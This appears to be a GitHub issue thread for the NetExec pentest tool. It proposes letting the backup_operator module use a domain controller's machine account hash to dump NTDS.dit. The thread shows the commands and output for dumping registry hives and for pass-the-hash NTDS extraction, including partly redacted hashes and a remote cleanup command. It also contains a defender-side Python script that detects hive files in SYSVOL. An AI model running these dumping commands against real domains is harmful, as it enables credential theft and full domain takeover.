
Add option for backup_operator smb module to use the machine account to dump NTDS.dit

Open Xorriath opened this issue 1 year ago • 2 comments

Please Describe The Problem To Be Solved

The smb module backup_operator fails to dump NTDS.dit when the local administrator account is disabled. I eliminated some lines below for visibility and redacted others.

nxc smb 192.168.210.16 -u '<user>' -p '<password>' -M backup_operator 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\<user>:<password>
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SAM to \\192.168.210.16\SYSVOL\SAM
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SYSTEM to \\192.168.210.16\SYSVOL\SYSTEM
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SECURITY to \\192.168.210.16\SYSVOL\SECURITY
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SAM" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SAM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SAM" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SAM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SECURITY" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SECURITY"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SECURITY" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SECURITY"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SYSTEM" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SYSTEM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SYSTEM" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SYSTEM"
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33e<redacted>579aa53:::  
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d<redacted>e393948
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] internal.zsm.local\Administrator:5bdd6a33efe<redacted>579aa53 STATUS_LOGON_FAILURE 
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] Use the domain admin account to clean the file on the remote host
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] netexec smb dc_ip -u user -p pass -x "del C:\Windows\sysvol\sysvol\SECURITY && del C:\Windows\sysvol\sysvol\SAM && del C:\Windows\sysvol\sysvol\SYSTEM"

(Optional): Suggest A Solution

From the output above, it can be seen that the module also dumps the machine account hash, which can be used to dump NTDS.dit as well. So there are 3 solutions for this:

  • The module dynamically detects that it cannot dump NTDS.dit as local administrator and then tries again using the machine account hash instead.
  • It can be added as an option to instruct the module to use the machine account hash instead of the local administrator when it tries to dump NTDS.dit
  • Always use the machine account hash to dump NTDS.dit

Of the 3 solutions, the first is likely the best. Below is a demonstration of performing the attack with netexec --ntds, thanks to the backup_operator module also providing the machine account hash:

nxc smb 192.168.210.16 -u 'ZPH-SVRCDC01$' -H d47a6d90<redacted>14e393948 --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\ZPH-SVRCDC01$:d47a6d<redacted>514e393948 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.210.16  445    ZPH-SVRCDC01     Administrator:500:aad3b435b51404eeaad3b435b51404ee:543b<redacted>8a1760d5e:::
<SNIP>

Xorriath, Feb 08 '25 19:02
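The output in the issue shows the detection surface this module leaves on a domain controller: the SAM, SYSTEM and SECURITY hives are saved under the SYSVOL share, downloaded over SMB, and then stay there until the cleanup command at the end of the output is run. The following script is an added example written from the defender's side; it is not NetExec code and not part of this issue. Check 1 scans a simplified, constructed key="value" rendering of Windows Security event 5145 (network share object access) for any access to a hive-named file in SYSVOL; the real event is EVTX/XML with more fields, so that line format, the account names, client address and GPO path are all assumptions. Check 2 walks a SYSVOL directory for leftover hive files, which is what the `del C:\Windows\sysvol\sysvol\...` cleanup would remove.

```python
"""Defender checks for the Backup Operators hive-dump pattern shown above.

Added example, not NetExec's own code. The event format below is a
constructed simplification of Security event 5145; the real event is
EVTX/XML and carries more fields.
"""
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Registry hive names that should never appear as files in SYSVOL.
HIVE_NAMES = {"SAM", "SYSTEM", "SECURITY"}

# Constructed sample events (accounts, hosts and paths are made up).
# 0x1 = FILE_READ_DATA, 0x10000 = DELETE in the Windows access mask.
SAMPLE_EVENTS = [
    # Normal SYSVOL traffic: a client reading a GPO file.
    r'EventID="5145" Account="INTERNAL\jdoe" Client="192.168.210.50" '
    r'ShareName="\\*\SYSVOL" RelativeTargetName="internal.zsm.local\Policies\{GUID-PLACEHOLDER}\gpt.ini" AccessMask="0x1"',
    # Hive files being pulled out of the SYSVOL root: the pattern to alert on.
    r'EventID="5145" Account="INTERNAL\svc-backup" Client="192.168.210.50" '
    r'ShareName="\\*\SYSVOL" RelativeTargetName="SAM" AccessMask="0x1"',
    r'EventID="5145" Account="INTERNAL\svc-backup" Client="192.168.210.50" '
    r'ShareName="\\*\SYSVOL" RelativeTargetName="SYSTEM" AccessMask="0x1"',
    # Same file name on a different share: out of scope for this rule.
    r'EventID="5145" Account="INTERNAL\svc-backup" Client="192.168.210.50" '
    r'ShareName="\\*\C$" RelativeTargetName="Windows\System32\config\SAM" AccessMask="0x1"',
    # Unrelated event type, must be ignored.
    r'EventID="4624" Account="INTERNAL\svc-backup" Client="192.168.210.50" LogonType="3"',
    # Cleanup of a leftover hive is also an access to the file and gets flagged.
    r'EventID="5145" Account="INTERNAL\svc-backup" Client="192.168.210.50" '
    r'ShareName="\\*\SYSVOL" RelativeTargetName="SECURITY" AccessMask="0x10000"',
]


@dataclass(frozen=True)
class Finding:
    account: str
    client: str
    share: str
    target: str
    access_mask: int


def parse_event(line: str) -> dict:
    """Turn a key="value" record into a dict with lower-case keys."""
    return {m.group(1).lower(): m.group(2)
            for m in re.finditer(r'(\w+)="([^"]*)"', line)}


def is_hive_in_sysvol(ev: dict) -> bool:
    """True when the accessed object is a file named like a hive inside SYSVOL.

    Any access counts (read, write or delete): a file literally called SAM,
    SYSTEM or SECURITY has no legitimate reason to exist in SYSVOL at all.
    """
    share = ev.get("sharename", "").upper()
    target = ev.get("relativetargetname", "").replace("/", "\\")
    basename = target.rsplit("\\", 1)[-1].upper()
    return share.endswith("\\SYSVOL") and basename in HIVE_NAMES


def scan_events(lines) -> list:
    """Check 1: return a Finding for every 5145 event touching a hive in SYSVOL."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("eventid") != "5145" or not is_hive_in_sysvol(ev):
            continue
        findings.append(Finding(ev["account"], ev["client"], ev["sharename"],
                                ev["relativetargetname"],
                                int(ev.get("accessmask", "0"), 16)))
    return findings


def find_leftover_hives(sysvol_root) -> list:
    """Check 2: list hive-named files anywhere under a SYSVOL directory tree."""
    root = Path(sysvol_root)
    return sorted(p for p in root.rglob("*")
                  if p.is_file() and p.name.upper() in HIVE_NAMES)


def demo_leftover_check() -> list:
    """Build a throwaway SYSVOL-like tree and return the hive names found in it."""
    with tempfile.TemporaryDirectory() as tmp:
        sysvol = Path(tmp) / "sysvol"
        sysvol.mkdir()
        (sysvol / "gpt.ini").write_text("[General]\nVersion=0\n")  # legitimate content
        (sysvol / "SAM").write_bytes(b"regf")                      # leftover hive
        return [p.name for p in find_leftover_hives(tmp)]


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[!] {f.account} from {f.client} accessed {f.share}\\{f.target} "
              f"(mask 0x{f.access_mask:x})")
    print("leftover hives in demo tree:", demo_leftover_check())
```

Check 1 is deliberately keyed on the file name and share rather than on the access mask, because the hive save itself happens server-side through RemoteRegistry and only the later SMB download (and any cleanup) shows up as share access; check 2 is the offline complement for a DC where share auditing was not enabled at the time.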

Maybe the 3rd option would even be the best as there won't be an AD with a disabled DC machine account, but there will definitely (or hopefully) ones with the default DA disabled. @mpgn thoughts?

NeffIsBack, Feb 08 '25 19:02

3rd option is the best, yes! But you will need to manually delete the files, so

  1. try with dom adm
  2. try with machine account

mpgn, Feb 08 '25 19:02